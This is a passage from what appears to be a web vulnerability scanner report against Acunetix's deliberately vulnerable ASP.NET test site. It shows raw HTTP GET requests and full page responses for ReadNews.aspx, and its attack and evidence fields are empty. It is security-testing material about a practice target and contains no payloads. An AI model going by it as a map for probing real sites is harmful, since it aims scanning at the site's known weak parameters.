style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 17979
Response Body - size: 17,979 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi/TB7mR4IysbuEg0lOgmHIs" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:24 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for 